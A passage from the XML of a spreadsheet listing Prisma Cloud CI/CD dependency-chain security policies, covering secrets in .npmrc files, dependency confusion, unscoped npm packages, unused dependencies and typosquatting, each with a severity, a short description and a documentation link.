https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-secrets-exposed-proxyurl-npmrc</t>
        </is>
      </c>
      <c r="Y229" t="inlineStr"/>
      <c r="Z229" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA229" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB229" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC229" t="inlineStr"/>
      <c r="AD229" t="b">
        <v>1</v>
      </c>
      <c r="AE229" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF229" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>24e149d3-18ee-4e01-94cc-bf3dcbd172de</t>
        </is>
      </c>
      <c r="AI229" t="inlineStr"/>
      <c r="AJ229" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK229" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" t="inlineStr"/>
      <c r="B230" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C230" s="2" t="inlineStr"/>
      <c r="D230" t="inlineStr"/>
      <c r="E230" t="inlineStr"/>
      <c r="F230" t="inlineStr"/>
      <c r="G230" t="b">
        <v>1</v>
      </c>
      <c r="H2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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J230" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K230" t="inlineStr">
        <is>
          <t>Secrets found in NPM dependency download URL in Azure repository</t>
        </is>
      </c>
      <c r="L230" t="inlineStr"/>
      <c r="M230" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N230" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O230" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P230" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q230" t="inlineStr"/>
      <c r="R230" t="inlineStr"/>
      <c r="S230" t="inlineStr"/>
      <c r="T230" t="b">
        <v>0</v>
      </c>
      <c r="U230" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V230" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W230" t="inlineStr">
        <is>
          <t>Including secrets in a NPM dependency download URL, which is found in the package-lock.json file, can allow an attacker who has gained access to the repository to gain unauthorized access to the package or to resources that are protected by the secret. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious code which could reach the production environment.</t>
        </is>
      </c>
      <c r="X230" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-secrets-npm-downloadurl</t>
        </is>
      </c>
      <c r="Y230" t="inlineStr"/>
      <c r="Z230" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA230" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB230" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC230" t="inlineStr"/>
      <c r="AD230" t="b">
        <v>1</v>
      </c>
      <c r="AE230" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF230" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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0" t="inlineStr">
        <is>
          <t>ec2f04e0-115c-4ad2-99d9-803e1593b50d</t>
        </is>
      </c>
      <c r="AI230" t="inlineStr"/>
      <c r="AJ230" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK230" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" t="inlineStr"/>
      <c r="B231" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C231" s="2" t="inlineStr"/>
      <c r="D231" t="inlineStr"/>
      <c r="E231" t="inlineStr"/>
      <c r="F231" t="inlineStr"/>
      <c r="G231" t="b">
        <v>1</v>
      </c>
      <c r="H2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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J231" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K231" t="inlineStr">
        <is>
          <t>NPM package downloaded from git without commit hash reference in a GitLab repository</t>
        </is>
      </c>
      <c r="L231" t="inlineStr"/>
      <c r="M231" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N231" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O231" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P231" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q231" t="inlineStr"/>
      <c r="R231" t="inlineStr"/>
      <c r="S231" t="inlineStr"/>
      <c r="T231" t="b">
        <v>0</v>
      </c>
      <c r="U231" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V231" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W231" t="inlineStr">
        <is>
          <t>NPM packages can be installed using a URL of a git repository, which may contain a reference to a branch, tag or commit hash. Without using a commit hash reference, the integrity of the downloaded package cannot be guaranteed. This can result in developers or build servers downloading a different version of the package than intended, potentially containing malicious code. This could expose both the development and production environments to risks.</t>
        </is>
      </c>
      <c r="X231" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-repo-npm-download-no-commit-hash-ref</t>
        </is>
      </c>
      <c r="Y231" t="inlineStr"/>
      <c r="Z231" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA231" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB231" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC231" t="inlineStr"/>
      <c r="AD231" t="b">
        <v>1</v>
      </c>
      <c r="AE231" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF231" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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1" t="inlineStr">
        <is>
          <t>01438813-fcd2-4afc-a3cf-2906f142c24e</t>
        </is>
      </c>
      <c r="AI231" t="inlineStr"/>
      <c r="AJ231" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK231" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" t="inlineStr"/>
      <c r="B232" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C232" s="2" t="inlineStr"/>
      <c r="D232" t="inlineStr"/>
      <c r="E232" t="inlineStr"/>
      <c r="F232" t="inlineStr"/>
      <c r="G232" t="b">
        <v>1</v>
      </c>
      <c r="H2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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J232" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K232" t="inlineStr">
        <is>
          <t>Potential dependency confusion in a GitHub repository due to package name or scope available in registry</t>
        </is>
      </c>
      <c r="L232" t="inlineStr"/>
      <c r="M232" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N232" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O232" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P232" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q232" t="inlineStr"/>
      <c r="R232" t="inlineStr"/>
      <c r="S232" t="inlineStr"/>
      <c r="T232" t="b">
        <v>0</v>
      </c>
      <c r="U232" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V232" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W232" t="inlineStr">
        <is>
          <t>Attackers can discover internal package names by scanning public repositories and artifacts. Then they can upload malicious packages with names identical to an organization's internal package names and scopes, hoping that improper package fetching configuration will cause internal clients to fetch the malicious package rather than the legitimate internal package with the same name. This is known as a Dependency Confusion attack.</t>
        </is>
      </c>
      <c r="X232" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-potential-dependency-confusion</t>
        </is>
      </c>
      <c r="Y232" t="inlineStr"/>
      <c r="Z232" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA232" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB232" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC232" t="inlineStr"/>
      <c r="AD232" t="b">
        <v>1</v>
      </c>
      <c r="AE232" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF232" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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2" t="inlineStr">
        <is>
          <t>a76ee242-b72b-4c7e-a0b2-89aec85bce23</t>
        </is>
      </c>
      <c r="AI232" t="inlineStr"/>
      <c r="AJ232" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK232" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" t="inlineStr"/>
      <c r="B233" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C233" s="2" t="inlineStr"/>
      <c r="D233" t="inlineStr"/>
      <c r="E233" t="inlineStr"/>
      <c r="F233" t="inlineStr"/>
      <c r="G233" t="b">
        <v>1</v>
      </c>
      <c r="H2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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J233" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K233" t="inlineStr">
        <is>
          <t>Secret exposed in registry URL within '.npmrc' file of a Bitbucket repository</t>
        </is>
      </c>
      <c r="L233" t="inlineStr"/>
      <c r="M233" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N233" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O233" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P233" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q233" t="inlineStr"/>
      <c r="R233" t="inlineStr"/>
      <c r="S233" t="inlineStr"/>
      <c r="T233" t="b">
        <v>0</v>
      </c>
      <c r="U233" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V233" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W233" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious packages to a registry which could reach the production environment or accessing internal packages on the registry.</t>
        </is>
      </c>
      <c r="X233" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-secrets-exposed-registryurl-npmrc</t>
        </is>
      </c>
      <c r="Y233" t="inlineStr"/>
      <c r="Z233" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA233" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB233" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC233" t="inlineStr"/>
      <c r="AD233" t="b">
        <v>1</v>
      </c>
      <c r="AE233" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF233" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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3" t="inlineStr">
        <is>
          <t>b0a346a3-36cb-45e2-b473-a74236bba9c0</t>
        </is>
      </c>
      <c r="AI233" t="inlineStr"/>
      <c r="AJ233" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK233" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" t="inlineStr"/>
      <c r="B234" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C234" s="2" t="inlineStr"/>
      <c r="D234" t="inlineStr"/>
      <c r="E234" t="inlineStr"/>
      <c r="F234" t="inlineStr"/>
      <c r="G234" t="b">
        <v>1</v>
      </c>
      <c r="H2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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J234" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K234" t="inlineStr">
        <is>
          <t>Secret exposed in proxy URL within '.npmrc' file of an Azure repository</t>
        </is>
      </c>
      <c r="L234" t="inlineStr"/>
      <c r="M234" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N234" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O234" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P234" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q234" t="inlineStr"/>
      <c r="R234" t="inlineStr"/>
      <c r="S234" t="inlineStr"/>
      <c r="T234" t="b">
        <v>0</v>
      </c>
      <c r="U234" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V234" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W234" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. For example, an attacker could use a secret that is used in a proxy configuration, such as the proxy or https-proxy keys, to access a proxy server and then use the proxy server to access restricted organization assets, such as an internal package registry.</t>
        </is>
      </c>
      <c r="X234" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repos-secret-proxy-url-npmrcfile</t>
        </is>
      </c>
      <c r="Y234" t="inlineStr"/>
      <c r="Z234" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA234" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB234" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC234" t="inlineStr"/>
      <c r="AD234" t="b">
        <v>1</v>
      </c>
      <c r="AE234" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF234" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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4" t="inlineStr">
        <is>
          <t>ef6ae837-eee2-4054-94e8-7f883044c4e2</t>
        </is>
      </c>
      <c r="AI234" t="inlineStr"/>
      <c r="AJ234" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK234" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" t="inlineStr"/>
      <c r="B235" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C235" s="2" t="inlineStr"/>
      <c r="D235" t="inlineStr"/>
      <c r="E235" t="inlineStr"/>
      <c r="F235" t="inlineStr"/>
      <c r="G235" t="b">
        <v>1</v>
      </c>
      <c r="H2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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J235" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K235" t="inlineStr">
        <is>
          <t>Missing '.npmrc' file in GitHub repository</t>
        </is>
      </c>
      <c r="L235" t="inlineStr"/>
      <c r="M235" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N235" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O235" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P235" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q235" t="inlineStr"/>
      <c r="R235" t="inlineStr"/>
      <c r="S235" t="inlineStr"/>
      <c r="T235" t="b">
        <v>0</v>
      </c>
      <c r="U235" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V235" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W235" t="inlineStr">
        <is>
          <t>The .npmrc file is a configuration file used by npm, the Node Package Manager, to manage settings and options related to package installation and publishing. Failing to store the .npmrc file in the repository can make the project vulnerable during pipelines to both dependency confusion, by allowing an internal package to be fetched from the public registry, as well as insecure use of credentials.</t>
        </is>
      </c>
      <c r="X235" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-missing-npmrc-file</t>
        </is>
      </c>
      <c r="Y235" t="inlineStr"/>
      <c r="Z235" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA235" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB235" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC235" t="inlineStr"/>
      <c r="AD235" t="b">
        <v>1</v>
      </c>
      <c r="AE235" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF235" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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 t="inlineStr">
        <is>
          <t>54060a65-1f8a-42c2-805a-f7717db85f24</t>
        </is>
      </c>
      <c r="AI235" t="inlineStr"/>
      <c r="AJ235" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK235" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" t="inlineStr"/>
      <c r="B236" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C236" s="2" t="inlineStr"/>
      <c r="D236" t="inlineStr"/>
      <c r="E236" t="inlineStr"/>
      <c r="F236" t="inlineStr"/>
      <c r="G236" t="b">
        <v>1</v>
      </c>
      <c r="H2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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J236" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K236" t="inlineStr">
        <is>
          <t>NPM project contains unused dependencies in a Bitbucket repository</t>
        </is>
      </c>
      <c r="L236" t="inlineStr"/>
      <c r="M236" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N236" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O236" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P236" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q236" t="inlineStr"/>
      <c r="R236" t="inlineStr"/>
      <c r="S236" t="inlineStr"/>
      <c r="T236" t="b">
        <v>0</v>
      </c>
      <c r="U236" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V236" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W236" t="inlineStr">
        <is>
          <t>NPM dependencies can potentially execute code during installation. Each added dependency expands the attack surface. Unused dependencies elevate the risk, as they unnecessarily widen the attack surface of a project without valid justification. An unused and compromised dependency exposes the project to unnecessary risks, potentially allowing malicious code to run on developers' endpoints, during build, or in production.</t>
        </is>
      </c>
      <c r="X236" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-repo-npm-project-unused-dependencies</t>
        </is>
      </c>
      <c r="Y236" t="inlineStr"/>
      <c r="Z236" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA236" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB236" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC236" t="inlineStr"/>
      <c r="AD236" t="b">
        <v>1</v>
      </c>
      <c r="AE236" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF236" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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6" t="inlineStr">
        <is>
          <t>41ea86ca-1c3c-4e4a-a7f7-c8756ea1d632</t>
        </is>
      </c>
      <c r="AI236" t="inlineStr"/>
      <c r="AJ236" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK236" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" t="inlineStr"/>
      <c r="B237" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C237" s="2" t="inlineStr"/>
      <c r="D237" t="inlineStr"/>
      <c r="E237" t="inlineStr"/>
      <c r="F237" t="inlineStr"/>
      <c r="G237" t="b">
        <v>1</v>
      </c>
      <c r="H2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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J237" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K237" t="inlineStr">
        <is>
          <t>Internal NPM package is not scoped in GitLab repository</t>
        </is>
      </c>
      <c r="L237" t="inlineStr"/>
      <c r="M237" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N237" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O237" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P237" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q237" t="inlineStr"/>
      <c r="R237" t="inlineStr"/>
      <c r="S237" t="inlineStr"/>
      <c r="T237" t="b">
        <v>0</v>
      </c>
      <c r="U237" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V237" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W237" t="inlineStr">
        <is>
          <t>Any third party can publish unscoped packages to the public NPM registry. If the organization does not own the names of the internal packages on the public registry, attackers could potentially upload malicious packages to the registry with identical or similar names, hoping that clients who have not configured their `.npmrc` files to fetch packages from the internal registry will mistakenly download them. Scoping packages in NPM can help protect against \"Dependency Confusion\" and Typosquatting attacks. This is because each NPM user/organization has their own scope, and only the user/organization`s owner can add packages to that scope. As a result, third parties cannot take the package name. Note: The package source displayed in the event field can be specified using one of the following methods described in these examples: • URL: https://registry.npmjs.org/example/-/example-1.0.0.tgz • Git URL: git+ssh://git@github.com/org/repo.git • Local file path: file:../foo/bar • Local linked package: folder/package</t>
        </is>
      </c>
      <c r="X237" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-internal-npm-package-not-scoped-repo</t>
        </is>
      </c>
      <c r="Y237" t="inlineStr"/>
      <c r="Z237" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA237" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB237" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC237" t="inlineStr"/>
      <c r="AD237" t="b">
        <v>1</v>
      </c>
      <c r="AE237" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF237" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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7" t="inlineStr">
        <is>
          <t>246249f6-5d10-4e24-9300-6c71e57484d6</t>
        </is>
      </c>
      <c r="AI237" t="inlineStr"/>
      <c r="AJ237" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK237" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" t="inlineStr"/>
      <c r="B238" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C238" s="2" t="inlineStr"/>
      <c r="D238" t="inlineStr"/>
      <c r="E238" t="inlineStr"/>
      <c r="F238" t="inlineStr"/>
      <c r="G238" t="b">
        <v>1</v>
      </c>
      <c r="H2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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J238" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K238" t="inlineStr">
        <is>
          <t>Secret exposed in registry URL within '.npmrc' file of a GitHub repository</t>
        </is>
      </c>
      <c r="L238" t="inlineStr"/>
      <c r="M238" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N238" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O238" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P238" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q238" t="inlineStr"/>
      <c r="R238" t="inlineStr"/>
      <c r="S238" t="inlineStr"/>
      <c r="T238" t="b">
        <v>0</v>
      </c>
      <c r="U238" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V238" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="W238" t="inlineStr">
        <is>
          <t>Including secrets in a .npmrc file can expose them to attackers who have gained unauthorized access to the repository, allowing them to use those secrets to access protected resources. The attacker could potentially use these secrets to impersonate the owner of the secret and to perform actions on their behalf, such as pushing malicious packages to a registry which could reach the production environment or accessing internal packages on the registry.</t>
        </is>
      </c>
      <c r="X238" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-secrets-exposed-registryurl-npmrc</t>
        </is>
      </c>
      <c r="Y238" t="inlineStr"/>
      <c r="Z238" t="inlineStr">
        <is>
          <t>{"category":"Dependency Chains","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA238" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB238" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC238" t="inlineStr"/>
      <c r="AD238" t="b">
        <v>1</v>
      </c>
      <c r="AE238" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF238" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG2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8" t="inlineStr">
        <is>
          <t>f5c6d223-17e2-4cec-875a-81d0936d5442</t>
        </is>
      </c>
      <c r="AI238" t="inlineStr"/>
      <c r="AJ238" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK238" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" t="inlineStr"/>
      <c r="B239" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C239" s="2" t="inlineStr"/>
      <c r="D239" t="inlineStr"/>
      <c r="E239" t="inlineStr"/>
      <c r="F239" t="inlineStr"/>
      <c r="G239" t="b">
        <v>1</v>
      </c>
      <c r="H2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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J239" t="inlineStr">
        <is>
          <t>CI/CD:Dependency Chains:</t>
        </is>
      </c>
      <c r="K239" t="inlineStr">
        <is>
          <t>Possible Python typosquatting detected in a GitHub repository</t>
        </is>
      </c>
      <c r="L239" t="inlineStr"/>
      <c r="M239" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N239" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O239" t="inlineStr">
        <is>
          <t>config</t>
